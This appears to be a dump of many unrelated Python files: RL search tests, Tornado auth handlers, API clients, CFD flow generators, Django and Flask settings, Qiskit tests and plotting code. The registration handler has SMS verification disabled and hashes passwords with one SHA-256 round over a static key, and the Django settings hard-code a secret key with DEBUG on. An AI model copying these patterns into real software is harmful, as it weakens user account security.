        # One receding horizon rollout of Monte Carlo search
        total_rew = 0
        prev_done = False
        for i, (a, ob, rew, done, info) in enumerate(receding_horizon(mc, env)):
            assert not prev_done, "should terminate if env returns done"
            prev_done = done
            assert env.action_space.contains(a)
            assert env.observation_space.contains(ob)
            total_rew += rew
            if i >= total_horizon:
                break
        assert i == total_horizon or done
        # Check it does better than random sequences
        random_rews = []
        for i in range(10):
            env.action_space.np_random.seed(seed + i)
            action_seq = [env.action_space.sample() for _ in range(total_horizon)]
            env.set_state(state)
            _, rews, _, _ = rollout(env, action_seq)
            random_rew = sum(rews)
            random_rews.append(random_rew)
            assert total_rew >= random_rew, "random sequence {}".format(i)
        print(
            f"Random actions on {env_name} for {total_horizon} obtains "
            f"mean {np.mean(random_rews)} s.d. {np.std(random_rews)}"
        )
        # Check against pre-defined score threshold
        assert total_rew >= score_thresholds[env_name]
        # Cleanup: the parallel searcher owns worker processes.
        if kind == "parallel":
            mc.close()
            with pytest.raises(BrokenPipeError):
                mc.best_action(state)
    return f
# Minimum total rewards observed to be comfortably attainable (see inline
# notes for tested values vs. random baselines).
MC_SINGLE_THRESHOLDS = {
    "Reacher-v2": -11,  # tested -9.5, random -17.25 s.d. 1.5
    "HalfCheetah-v2": 19,  # tested 21.6, random -4.2 s.d. 3.7
    "Hopper-v2": 29,  # tested 31.1, random 15.2 s.d. 5.9
}
MC_PARALLEL_THRESHOLDS = {
    "Reacher-v2": -17,  # tested at -15.3; random -25.8 s.d. 1.8
    "HalfCheetah-v2": 33,  # tested at 35.5; random -6.0 s.d. 7.1
    "Hopper-v2": 52,  # tested at 54.7; random 21.1 s.d. 13.2
}
# Build the closures, then parametrize them so pytest collects one test per env.
_test_mc_single = check_monte_carlo(
    "single", MC_SINGLE_THRESHOLDS, total_horizon=20, planning_horizon=10, trajectories=100
)
_test_mc_parallel = check_monte_carlo(
    "parallel", MC_PARALLEL_THRESHOLDS, total_horizon=30, planning_horizon=15, trajectories=200
)
test_mc_single = pytest.mark.parametrize("env_name", MONTE_CARLO_ENVS)(_test_mc_single)
test_mc_parallel = pytest.mark.parametrize("env_name", MONTE_CARLO_ENVS)(_test_mc_parallel)
| 5,560 | 2,092 |
# -*- coding: utf-8 -*-
# @Time : 20-4-13 下午4:40
# @File : handlers.py
import logging
import re
import hashlib
import config
from utils.response_code import RET
from utils.session import Session
from basehandler import BaseHandler
class RegisterHandler(BaseHandler):
    """Handles user registration (mobile number + SMS code + password)."""

    def post(self, *args, **kwargs):
        # Extract the JSON payload sent by the front end
        mobile = self.json_args.get('mobile')
        smsCode = self.json_args.get('phoneCode')
        password = self.json_args.get('password')
        password2 = self.json_args.get('password2')
        # Reject the request if any parameter is missing
        if not all((mobile, smsCode, password, password2)):
            return self.write(dict(errorcode=RET.NODATA, errormsg='参数不完整'))
        # Validate the mobile number format (11 digits starting with 1)
        if not re.match(r"^1\d{10}$", mobile):
            return self.write(dict(errorcode=RET.NODATA, errormsg='输入手机号码不正确'))
        # The two password entries must match
        if password != password2:
            return self.write(dict(errorcode=RET.PARAMERR, errormsg='两次输入密码不一致'))
        # SMS-code verification is currently disabled:
        # try:
        #     real_sms_code = self.redis.get('sms_code_%s' % mobile)
        # except Exception as e:
        #     logging.error(e)
        #     return self.write(dict(errorcode=RET.DBERR, errormsg='查询短信验证码出错'))
        # # Check whether the SMS code has expired
        # if not real_sms_code:
        #     return self.write(dict(errorcode=RET.DBERR, errormsg='短信验证码过期'))
        # # Compare the submitted code against the real one
        # if smsCode != real_sms_code:
        #     return self.write(dict(errorcode=RET.DATAERR, errormsg='短信验证码输入有误'))
        # # Delete the SMS code stored in Redis
        # try:
        #     self.redis.delete('sms_code_%s' % mobile)
        # except Exception as e:
        #     logging.error(e)
        # Persist the user; duplicate mobiles are rejected by the unique
        # constraint on the mobile column.
        # NOTE(review): `password + config.passwd_hash_key` fed to sha256 only
        # works on Python 2 (str); Python 3 requires bytes.
        password = hashlib.sha256(password + config.passwd_hash_key).hexdigest()
        sql_str = "insert into ih_user_profile(up_name, up_mobile, up_passwd) values (%(name)s, %(mobile)s, %(passwd)s);"
        try:
            user_id = self.db.execute(sql_str, name=mobile, mobile=mobile, passwd=password)
        except Exception as e:
            logging.error(e)
            return self.write(dict(errorcode=RET.DBERR, errormsg='手机号码已被注册'))
        # Record the user's login state in the session
        session = Session(self)
        session.data['user_id'] = user_id
        session.data['mobile'] = mobile
        session.data['name'] = mobile
        try:
            session.save()
        except Exception as e:
            logging.error(e)
        return self.write(dict(errorcode=RET.OK, errormsg='注册成功'))
class LoginHandler(BaseHandler):
    """Handles login with a mobile number and password."""

    def post(self, *args, **kwargs):
        # Extract the JSON payload sent by the front end
        mobile = self.json_args.get('mobile')
        password = self.json_args.get('password')
        # Validate parameters
        if not all([mobile, password]):
            return self.write(dict(errorcode=RET.PARAMERR, errormsg="参数错误"))
        if not re.match(r"^1\d{10}$", mobile):
            return self.write(dict(errorcode=RET.DATAERR, errormsg="手机号错误"))
        # Look up the stored password hash for this mobile number
        res = self.db.get("select up_user_id,up_name,up_passwd from ih_user_profile where up_mobile=%(mobile)s",
                          mobile=mobile)
        # NOTE(review): str concatenation into sha256 and the `unicode`
        # builtin below are Python 2 only.
        password = hashlib.sha256(password + config.passwd_hash_key).hexdigest()
        if res and res["up_passwd"] == unicode(password):
            # Populate session data and report success to the client
            try:
                self.session = Session(self)
                self.session.data['user_id'] = res['up_user_id']
                self.session.data['name'] = res['up_name']
                self.session.data['mobile'] = mobile
                self.session.save()
            except Exception as e:
                logging.error(e)
            return self.write(dict(errorcode=RET.OK, errormsg="OK"))
        else:
            return self.write(dict(errorcode=RET.DATAERR, errormsg="手机号或密码错误!"))
class CheckLoginHandler(BaseHandler):
    """Reports whether the current request carries a valid login session."""

    def get(self, *args, **kwargs):
        # Truthy return means session data exists for this user
        if self.get_current_user():
            return self.write(dict(errorcode=RET.OK, errormsg="true", data={"name":self.session.data['name']}))
        else:
            return self.write(dict(errorcode=RET.USERERR, errormsg="false"))
| 4,219 | 1,636 |
from .gen.custom_field_settings import _CustomFieldSettings
class CustomFieldSettings(_CustomFieldSettings):
    """Custom Field Settings resource"""

    def find_by_project(self, project, params=None, **options):
        """Returns a list of all of the custom fields settings on a project.

        Parameters
        ----------
        project : {Gid} The ID of the project for which to list custom field settings
        [params] : {Object} Parameters for the request
        """
        # None sentinel instead of a mutable default dict argument.
        if params is None:
            params = {}
        path = "/projects/%s/custom_field_settings" % (project)
        return self.client.get_collection(path, params, **options)

    def find_by_portfolio(self, portfolio, params=None, **options):
        """Returns a list of all of the custom fields settings on a portfolio.

        Parameters
        ----------
        portfolio : {Gid} The ID of the portfolio for which to list custom field settings
        [params] : {Object} Parameters for the request
        """
        # None sentinel instead of a mutable default dict argument.
        if params is None:
            params = {}
        path = "/portfolios/%s/custom_field_settings" % (portfolio)
        return self.client.get_collection(path, params, **options)
| 1,091 | 289 |
from google.appengine.ext import ndb
from .character import Character
from .utils import paginated_query
class Faction(ndb.Model):
    """Datastore model for a faction that characters can belong to."""

    name = ndb.StringProperty(required=True)
    description = ndb.TextProperty()
    created = ndb.DateTimeProperty(required=True, auto_now_add=True)  # set on insert
    updated = ndb.DateTimeProperty(required=True, auto_now=True)  # refreshed on every put

    @classmethod
    def get_factions(cls, **kwargs):
        "Return all factions in alphabetical order."
        q = cls.query()
        # Forward and backward orderings support paging in both directions.
        q_forward = q.order(cls.name)
        q_backward = q.order(-cls.name)
        return paginated_query(q_forward, q_backward, **kwargs)

    def get_characters(self, **kwargs):
        "Return characters in faction in alphabetical order."
        q = Character.query(Character.faction_key == self.key)
        q_forward = q.order(Character.name)
        q_backward = q.order(-Character.name)
        return paginated_query(q_forward, q_backward, **kwargs)

    @classmethod
    def get_by_name(cls, name):
        # Returns an async future (get_async); the caller is expected to
        # resolve it with .get_result().
        return cls.query(cls.name == name).get_async()
| 1,049 | 335 |
# Copyright 2013 by Rackspace Hosting, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def header_property(wsgi_name):
    """Creates a read-only header property.

    Args:
        wsgi_name (str): Case-sensitive name of the header as it would
            appear in the WSGI environ dict (i.e., 'HTTP_*')

    Returns:
        A property instance that can be assigned to a class variable.
    """
    def fget(self):
        # Missing headers and empty values both read back as None.
        return self.env.get(wsgi_name) or None
    return property(fget)
class Body(object):
    """Wrap wsgi.input streams to make them more robust.

    Some WSGI servers expose wsgi.input as a socket._fileobject or an
    io.BufferedReader whose read() blocks indefinitely when called with no
    size, or with a size larger than the request's content length. This
    wrapper normalizes that behavior by clamping every read to the declared
    content length, so reads never block past the end of the request body.

    Args:
        stream: Instance of socket._fileobject from environ['wsgi.input']
        stream_len: Expected content length of the stream.
    """

    def __init__(self, stream, stream_len):
        self.stream = stream
        self.stream_len = stream_len

    def __iter__(self):
        return self

    def __next__(self):
        return next(self.stream)

    next = __next__  # Python 2 iterator protocol alias

    def _read(self, size, target):
        """Clamp *size* to the content length and delegate to *target*.

        Args:
            size (int): Maximum number of bytes/characters to read. None and
                -1 mean "everything"; any request beyond the content length
                is capped so non-conforming streams never block.
            target (callable): Stream method that performs the actual read.

        Returns:
            Data read from the stream, as returned by `target`.
        """
        unbounded = size is None or size == -1
        capped = self.stream_len if unbounded else min(size, self.stream_len)
        return target(capped)

    def read(self, size=None):
        """Read from the stream.

        Args:
            size (int): Maximum number of bytes/characters to read.
                Defaults to reading until EOF.

        Returns:
            Data read from the stream.
        """
        return self._read(size, self.stream.read)

    def readline(self, limit=None):
        """Read a single line from the stream.

        Args:
            limit (int): Maximum number of bytes/characters to read.
                Defaults to reading until EOF.

        Returns:
            Data read from the stream.
        """
        return self._read(limit, self.stream.readline)

    def readlines(self, hint=None):
        """Read all lines from the stream.

        Args:
            hint (int): Maximum number of bytes/characters to read.
                Defaults to reading until EOF.

        Returns:
            Data read from the stream.
        """
        return self._read(hint, self.stream.readlines)
| 3,790 | 1,037 |
"""
Gmsh format 2.2
"""
import numpy as np
from flow import Flow
from element import Element
from element_search import find_neighbors
from text.text_flow import write_flow
from text.text_elements import write_elements
from text.text_geometries import write_geometries
#==============================================================================
def intIt(l):
    """Convert a sequence of string tokens to an integer numpy array."""
    return np.array(list(map(int, l)))
def floatIt(l):
    """Convert a sequence of string tokens to a float numpy array."""
    return np.array(list(map(float, l)))
def extract_msh(path_msh):
    """Parse a Gmsh format 2.2 .msh file.

    Reads the node coordinates and collects only the 6-node second-order
    triangles (element type 9); all other element types are skipped (the
    previously commented-out handling of types 1/2/3/8/10/15 was removed).

    :param path_msh: path to the .msh file
    :return: tuple (nodes_X, nodes_Y, elements) of numpy arrays
    """
    nodes_X, nodes_Y = [], []
    elements = []
    # `with` guarantees the handle is closed even if parsing raises
    # (the original leaked the file on error).
    with open(path_msh, 'r') as f:
        line = f.readline()
        # Skip ahead to the node section:
        #   $Nodes
        #   n_nodes
        #   id x y z        (one line per node)
        while line != '$Nodes\n':
            line = f.readline()
        line = f.readline()
        n_nodes = int(line.strip())
        for i in range(n_nodes):
            line = f.readline()
            coord = floatIt(line.strip().split())
            nodes_X.append(coord[1])
            nodes_Y.append(coord[2])
        # Skip ahead to the element section:
        #   $Elements
        #   n_elements
        #   element_id element_type ... nodes_id
        while line != '$Elements\n':
            line = f.readline()
        line = f.readline()
        n_elements = int(line.strip())
        count = 0
        for i in range(n_elements):
            line = f.readline()
            coord = intIt(line.strip().split())
            element_type = coord[1]
            if element_type == 9:  # 6-node second order triangle
                count += 1
                e = Element(count)
                e.nodes = np.array(coord[-6:])
                elements.append(e)
    return np.array(nodes_X), np.array(nodes_Y), np.array(elements)
def generate_poiseuille(path_msh, parent_folder):
    """Generate a steady plane-Poiseuille flow dataset from a Gmsh mesh.

    :param path_msh: path to the Gmsh .msh file
    :param parent_folder: output root containing flows/, elements/, geometries/
    """
    single_nodes_X, single_nodes_Y, elements = extract_msh(path_msh)
    # Channel height and centerline position from the mesh extents.
    d = np.max(single_nodes_Y) - np.min(single_nodes_Y)
    y_middle = np.min(single_nodes_Y) + d/2
    n_nodes = len(single_nodes_X)
    mu = 1e-3  # dynamic viscosity
    # Analytical solution: linear pressure drop, parabolic velocity profile.
    p = 2*mu*single_nodes_X
    U = d**2/4 - (single_nodes_Y - y_middle)**2
    V = np.zeros(n_nodes)
    nodes_X, nodes_Y = np.array([]), np.array([])
    Us, Vs, ps = np.array([]), np.array([]), np.array([])
    Nt = 101
    times = np.linspace(0, 1, Nt)
    # Steady flow: stack the same snapshot once per time step.
    for t in times:
        nodes_X = np.vstack([nodes_X, single_nodes_X]) if nodes_X.size else single_nodes_X
        nodes_Y = np.vstack([nodes_Y, single_nodes_Y]) if nodes_Y.size else single_nodes_Y
        Us = np.vstack([Us, U]) if Us.size else U
        Vs = np.vstack([Vs, V]) if Vs.size else V
        ps = np.vstack([ps, p]) if ps.size else p
    Re, Ur = 1e-3*1*d/mu, np.inf # Reynolds number and reduced velocity are not
    # defined in the Hagen-Poiseuille problem
    flow = Flow()
    flow.Re, flow.Ur = Re, Ur
    flow.times = times
    flow.nodes_X, flow.nodes_Y = nodes_X, nodes_Y
    flow.Us, flow.Vs, flow.ps = Us, Vs, ps
    write_flow(flow, parent_folder + 'flows/poiseuille')
    find_neighbors(elements)
    write_elements(elements, parent_folder + 'elements/poiseuille')
    write_geometries(np.array([]), parent_folder + 'geometries/poiseuille')
def generate_periodic(path_msh, parent_folder):
    """Generate the analytic uniform oscillating flow on a mesh and write
    flow, element and geometry files under `parent_folder`.

    U = U0*cos(wt) with U0 = 1.
    Navier-Stokes, uniform: rho dU/dt + 0 = -dp/dx with rho = 1, so
    dp/dx = rho*U0*w*sin(wt) and p = p0 + rho*U0*w*sin(wt) with p0 = 0.

    Args:
        path_msh: path to the gmsh .msh file.
        parent_folder: output root with 'flows/', 'elements/', 'geometries/'.
    """
    single_nodes_X, single_nodes_Y, elements = extract_msh(path_msh)
    d = np.max(single_nodes_Y) - np.min(single_nodes_Y)
    n_nodes = len(single_nodes_X)
    Nt = 101
    times = np.linspace(0, 1, Nt)
    period = 0.25
    w = 2*np.pi/period
    # One copy of the node coordinates per time step, shape (Nt, n_nodes).
    nodes_X = np.tile(single_nodes_X, (Nt, 1))
    nodes_Y = np.tile(single_nodes_Y, (Nt, 1))
    # BUG FIX: the original computed U/V/p from the *accumulated* nodes_X
    # inside the time loop, so each step appended k rows instead of one and
    # Us/Vs/ps grew to Nt*(Nt+1)/2 rows (inconsistent with `times` and with
    # the other generators). The fields are spatially uniform: row k holds
    # cos(w*t_k) / 0 / w*sin(w*t_k) at every node.
    Us = np.outer(np.cos(w*times), np.ones(n_nodes))
    Vs = np.zeros((Nt, n_nodes))
    ps = np.outer(w*np.sin(w*times), np.ones(n_nodes))
    Re, Ur = 1*1*d/1e-6, np.inf
    flow = Flow()
    flow.Re, flow.Ur = Re, Ur
    flow.times = times
    flow.nodes_X, flow.nodes_Y = nodes_X, nodes_Y
    flow.Us, flow.Vs, flow.ps = Us, Vs, ps
    write_flow(flow, parent_folder + 'flows/periodic')
    find_neighbors(elements)
    write_elements(elements, parent_folder + 'elements/periodic')
    write_geometries(np.array([]), parent_folder + 'geometries/periodic')
def generate_inviscid(path_msh, parent_folder):
    """Generate the steady potential (inviscid) flow around a cylinder of
    radius 0.5 on a mesh and write flow/element/geometry files under
    `parent_folder` (suffix 'potential')."""
    single_nodes_X, single_nodes_Y, elements = extract_msh(path_msh)
    # Polar coordinates of each node, cylinder centered at the origin.
    rs = np.sqrt(single_nodes_X**2 + single_nodes_Y**2)
    thetas = np.arctan2(single_nodes_Y, single_nodes_X)
    Ur, Utheta, p = [], [], []
    for r, theta in zip(rs, thetas):
        if r == 0:
            # Guard against division by zero at the origin.
            Ur.append(0)
            Utheta.append(0)
            p.append(0)
        else:
            # Potential-flow fields for a cylinder of radius a = 0.5.
            # NOTE(review): Utheta uses +sin(theta) and the Cartesian
            # conversion below uses minus signs -- the sign conventions must
            # compensate each other; confirm against the reference solution.
            Ur.append((1 - (0.5/r)**2)*np.cos(theta))
            Utheta.append((1 + (0.5/r)**2)*np.sin(theta))
            p.append(2*(0.5/r)**2 * np.cos(2*theta) - (0.5/r)**4)
    Ur = np.array(Ur)
    Utheta = np.array(Utheta)
    p = np.array(p)
    # Polar -> Cartesian velocity components.
    U = Ur*np.cos(thetas) - Utheta*np.sin(thetas)
    V = Ur*np.sin(thetas) - Utheta*np.cos(thetas)
    nodes_X, nodes_Y = np.array([]), np.array([])
    Us, Vs, ps = np.array([]), np.array([]), np.array([])
    Nt = 101
    times = np.linspace(0, 1, Nt)
    # Steady flow: stack the same snapshot once per time step.
    for t in times:
        nodes_X = np.vstack([nodes_X, single_nodes_X]) if nodes_X.size else single_nodes_X
        nodes_Y = np.vstack([nodes_Y, single_nodes_Y]) if nodes_Y.size else single_nodes_Y
        Us = np.vstack([Us, U]) if Us.size else U
        Vs = np.vstack([Vs, V]) if Vs.size else V
        ps = np.vstack([ps, p]) if ps.size else p
    # NOTE: this rebinds `Ur` (previously the radial-velocity array) to the
    # scalar reduced velocity for the Flow record.
    Re, Ur = 1e+6, 0.
    flow = Flow()
    flow.Re, flow.Ur = Re, Ur
    flow.times = times
    flow.nodes_X, flow.nodes_Y = nodes_X, nodes_Y
    flow.Us, flow.Vs, flow.ps = Us, Vs, ps
    write_flow(flow, parent_folder + 'flows/potential')
    find_neighbors(elements)
    write_elements(elements, parent_folder + 'elements/potential')
    # Hard-coded node ids of the cylinder boundary for this specific mesh.
    write_geometries(np.array([[5,407,404,408,405,409,406,410,6,414,411,415,412,416,413,417]]),
                     parent_folder + 'geometries/potential')
| 7,190 | 2,829 |
# Copyright: (c) 2020, Syntropy Network
# MIT License
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import os
import traceback
SDK_IMP_ERR = None
try:
from syntropy_sdk import ApiClient, ApiKeysApi, AuthApi, Configuration, PlatformApi
from syntropy_sdk.exceptions import ApiException, SyntropyError
from syntropy_sdk.models import AccessTokenData
from syntropy_sdk.utils import (
MAX_QUERY_FIELD_SIZE,
BatchedRequest,
login_with_access_token,
)
from syntropynac.configure import configure_network
from syntropynac.exceptions import ConfigureNetworkError
from syntropynac.fields import ConfigFields
HAS_SDK = True
except ImportError:
HAS_SDK = False
SDK_IMP_ERR = traceback.format_exc()
class EnvVars:
    """Names of the environment variables used as fallbacks for API configuration."""
    API_URL = "SYNTROPY_API_SERVER"  # base URL of the Syntropy API server
    TOKEN = "SYNTROPY_API_TOKEN"  # access token used for authentication
def get_api_client(api_url=None, api_key=None):
    """Build an authenticated Syntropy ApiClient.

    When `api_url` / `api_key` are not given, they fall back to the
    SYNTROPY_API_SERVER / SYNTROPY_API_TOKEN environment variables.
    """
    host = api_url or os.environ.get(EnvVars.API_URL)
    access_token = api_key or os.environ.get(EnvVars.TOKEN)
    config = Configuration()
    config.host = host
    # Exchange the access token for an Authorization credential.
    config.api_key["Authorization"] = login_with_access_token(host, access_token)
    return ApiClient(config)
def api_getter_builder(T):
    """Return a factory that builds instances of API class `T`.

    The factory accepts either a ready-made `client` or the url/key pair
    needed to construct one via get_api_client().
    """
    def get(api_url=None, api_key=None, client=None):
        if client is None:
            client = get_api_client(api_url, api_key)
        return T(client)
    return get
# Bind the concrete API getters only when the SDK imported successfully;
# if the import failed these names are simply left undefined.
if HAS_SDK:
    get_auth_api = api_getter_builder(AuthApi)
    get_api_keys_api = api_getter_builder(ApiKeysApi)
    get_platform_api = api_getter_builder(PlatformApi)
| 1,581 | 547 |
# Django settings for testproject project.
import os

# Directory containing this settings file; anchors the SQLite paths below.
DIRNAME = os.path.dirname(__file__)

# Test-project defaults -- never run production with DEBUG enabled.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = True

ADMINS = ()
MANAGERS = ADMINS

# File-based SQLite databases beside this module (separate file for tests).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(DIRNAME, 'db.sqlite3'),
        'TEST_NAME': os.path.join(DIRNAME, 'test_db.sqlite3'),
    }
}

TIME_ZONE = 'Europe/Rome'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True

MEDIA_ROOT = ''
MEDIA_URL = ''

# NOTE(review): hard-coded secret key is acceptable only for a test project.
SECRET_KEY = 'vaO4Y<g#YRWG8;Md8noiLp>.w(w~q_b=|1`?9<x>0KxA%UB!63'

# NOTE(review): TEMPLATE_LOADERS/TEMPLATE_DIRS and MIDDLEWARE_CLASSES are
# pre-Django-1.10 settings names, so this file targets an old Django release.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
)

MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
)

ROOT_URLCONF = 'custard.tests.urls'

TEMPLATE_DIRS = ()

INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.admin',
    'custard',
    'custard.tests',
)

TEST_RUNNER = 'django.test.runner.DiscoverRunner'

STATIC_URL = '/static/'
| 1,394 | 558 |
# Read a product price and print it together with a 5% discount.
p = float(input('Digite o preço do produto'))
d = p - (p * 5 / 100)
print(f'o preço do produto é {p:.2f} e com 5% de desconto fica {d:.2f}')
from flask import (Blueprint, request)
from . import temp
# Blueprint grouping the temperature endpoints under /api/temp.
temp_controller = Blueprint('temp-controller', __name__, url_prefix='/api/temp')

@temp_controller.route('/', methods=["GET"])
def api_temp_control():
    """GET /api/temp/ -- return the value produced by temp.read_temp()."""
    return temp.read_temp()
from inspect import stack
import logging
from time import mktime
import pytz
from datetime import *
from calendar import timegm
# from django.http import HttpResponse, HttpResponseRedirect, HttpResponseRedirectBase
from django.conf import settings
from django.utils import timezone
from social.apps.django_app.default.models import UserSocialAuth
import twitter
from twitter import *
EPOCH = 1970  # Unix epoch year
# Proleptic-Gregorian ordinal of 1970-01-01.
# NOTE(review): not referenced anywhere in this module chunk; confirm usage
# elsewhere before removing.
_EPOCH_ORD = date(EPOCH, 1, 1).toordinal()
class Tz:
    """Timezone conversion helpers bridging pytz and Django's current-timezone."""

    # assumes a date, unless you pass date_format, and then assumes it needs to be parsed
    @staticmethod
    def convert_to_utc(naive, date_format=None, user_tz=None):
        """Localize a naive datetime (parsing it first when `date_format`
        is given) in `user_tz` and return the equivalent UTC datetime."""
        if date_format:
            naive = datetime.strptime(naive, date_format)
        # Default to the timezone of the current user context.
        tz = user_tz or timezone.get_current_timezone()
        localized = tz.localize(naive, is_dst=None)
        return localized.astimezone(pytz.utc)

    @staticmethod
    def convert_to_local(dt, user_tz=None):
        """Return `dt` converted into `user_tz` (default: current user
        context timezone)."""
        tz = user_tz or timezone.get_current_timezone()
        return dt.astimezone(tz)
class Logger():
    """Thin static wrapper around the standard logging module.

    BUG FIX: the original methods called a module-level name ``LOGGER`` that
    is never defined anywhere in this module, so the first call raised
    NameError. A module logger is now created once and shared.
    """

    # Single logger instance shared by all calls.
    _logger = logging.getLogger(__name__)

    @staticmethod
    def info(str):
        # Parameter keeps its original (builtin-shadowing) name for
        # backward compatibility with keyword callers.
        """Log the given message at INFO level."""
        Logger._logger.info(str)

    @staticmethod
    def exception(str):
        """Log the given message at ERROR level with the active exception traceback."""
        Logger._logger.exception(str)
class Twitter:
    """Helpers building authenticated python-twitter API clients from a
    Django user's stored social-auth credentials."""

    @staticmethod
    def get_twitter(user):
        """Return a twitter.Api authenticated as `user`.

        Starts from the app-level tokens in settings and overrides them with
        the user's own OAuth token when one is stored.

        Raises:
            Exception: if no access token key/secret can be resolved.
        """
        from django.conf import settings
        consumer_key = settings.SOCIAL_AUTH_TWITTER_KEY
        consumer_secret = settings.SOCIAL_AUTH_TWITTER_SECRET
        # App-wide fallback tokens; replaced below by the user's own.
        access_token_key = settings.TWITTER_ACCESS_TOKEN
        access_token_secret = settings.TWITTER_ACCESS_TOKEN_SECRET
        # NOTE(review): objects.get() raises DoesNotExist rather than
        # returning a falsy value, so the `if usa:` guard never filters --
        # a missing record propagates as an exception; confirm intended.
        usa = UserSocialAuth.objects.get(user=user, provider='twitter')
        if usa:
            access_token = usa.extra_data['access_token']
            if access_token:
                access_token_key = access_token['oauth_token']
                access_token_secret = access_token['oauth_token_secret']
        if not access_token_key or not access_token_secret:
            raise Exception('No user for twitter API call')
        api = twitter.Api(
            base_url='https://api.twitter.com/1.1',
            consumer_key=consumer_key,
            consumer_secret=consumer_secret,
            access_token_key=access_token_key,
            access_token_secret=access_token_secret)
        return api

    @staticmethod
    def get_access_tokens(user):
        """Return the raw OAuth access-token data stored for `user`."""
        usa = UserSocialAuth.objects.get(user=user, provider='twitter')
        access_token = usa.extra_data['access_token']
        return access_token
| 2,753 | 834 |
# Monkey-patch: null out the `interface` attribute on ShaderNodeGroup.
# NOTE(review): ShaderNodeGroup is not defined in this fragment -- presumably
# Blender's bpy.types.ShaderNodeGroup; confirm against the importing module.
ShaderNodeGroup.interface = None
| 35 | 12 |
"""
Python RPC Client for Discord
-----------------------------
By: qwertyquerty and LewdNeko
"""
from .baseclient import BaseClient
from .client import Client
from .presence import Presence
from .exceptions import *
# Package metadata.
__title__ = 'pypresence'
__author__ = 'qwertyquerty'
__copyright__ = 'Copyright 2018 qwertyquerty'
__license__ = 'MIT'
__version__ = '1.0.9'
| 360 | 129 |
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Tests preset pass manager functionalities"""
from qiskit.test import QiskitTestCase
from qiskit.compiler import transpile
from qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister
from qiskit.test.mock import FakeTenerife, FakeMelbourne, FakeRueschlikon, FakeTokyo
class TestPresetPassManager(QiskitTestCase):
    """Test preset passmanagers work as expected."""

    def test_no_coupling_map(self):
        """Test that coupling_map can be None"""
        qr = QuantumRegister(2, name='q')
        circuit = QuantumCircuit(qr)
        circuit.cz(qr[0], qr[1])
        basis = ['u1', 'u2', 'u3', 'cx']
        # Every optimization level must accept a missing coupling map.
        for level in range(4):
            with self.subTest(level=level):
                transpiled = transpile(circuit,
                                       basis_gates=basis,
                                       optimization_level=level)
                self.assertIsInstance(transpiled, QuantumCircuit)
class TestFakeBackendTranspiling(QiskitTestCase):
    """Test transpiling on mock backends work properly"""

    def setUp(self):
        """Build the shared 2-qubit Bell-state-and-measure circuit."""
        # FIX: invoke the base-class setUp so QiskitTestCase/unittest
        # per-test initialization runs (the original skipped it).
        super().setUp()
        q = QuantumRegister(2)
        c = ClassicalRegister(2)

        self._circuit = QuantumCircuit(q, c)
        self._circuit.h(q[0])
        self._circuit.cx(q[0], q[1])
        self._circuit.measure(q, c)

    def test_optimization_level(self):
        """Test several backends with all optimization levels"""
        for backend in [FakeTenerife(), FakeMelbourne(), FakeRueschlikon(), FakeTokyo()]:
            for optimization_level in range(4):
                result = transpile(
                    [self._circuit],
                    backend=backend,
                    optimization_level=optimization_level
                )
                self.assertIsInstance(result, QuantumCircuit)
| 2,193 | 682 |
#!/usr/bin/env python
# coding=utf-8
# wujian@2020
import argparse
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
from libs.data_handler import SpectrogramReader
from libs.opts import StftParser
from libs.utils import get_logger
# Plotting defaults: font, resolution and output image format.
default_font = "Times New Roman"
# NOTE(review): default_font_size is defined but not referenced in this chunk.
default_font_size = 10
default_dpi = 200
default_fmt = "jpg"

logger = get_logger(__name__)
def save_figure(key, mat, dest, cmap="jet", hop=256, sr=16000, title=""):
    """
    Save figure to disk

    Args:
        key: utterance key, used only for logging.
        mat: spectrogram-like matrix, (T, F) or (N, T, F) for N channels.
        dest: output path *without* extension (default_fmt is appended).
        cmap: matplotlib colormap name.
        hop: STFT frame hop in samples (converts frames to seconds on x).
        sr: sample rate in Hz (converts bins to kHz on y).
        title: figure title; for multi-channel input a ";"-separated list
            provides one title per channel.
    """
    def sub_plot(ax, mat, num_frames, num_bins, xticks=True, title=""):
        # Draw one channel: transpose so time runs along x and frequency
        # along y, with the origin at the bottom.
        ax.imshow(np.transpose(mat),
                  origin="lower",
                  cmap=cmap,
                  aspect="auto",
                  interpolation="none")
        if xticks:
            # 5 evenly spaced time ticks labelled in seconds.
            xp = np.linspace(0, num_frames - 1, 5)
            ax.set_xticks(xp)
            ax.set_xticklabels([f"{t:.2f}" for t in (xp * hop / sr)],
                               fontproperties=default_font)
            ax.set_xlabel("Time (s)", fontdict={"family": default_font})
        else:
            ax.set_xticks([])
        # 6 evenly spaced frequency ticks labelled in kHz up to Nyquist.
        yp = np.linspace(0, num_bins - 1, 6)
        fs = np.linspace(0, sr / 2, 6) / 1000
        ax.set_yticks(yp)
        ax.set_yticklabels([f"{t:.1f}" for t in fs],
                           fontproperties=default_font)
        ax.set_ylabel("Frequency (kHz)", fontdict={"family": default_font})
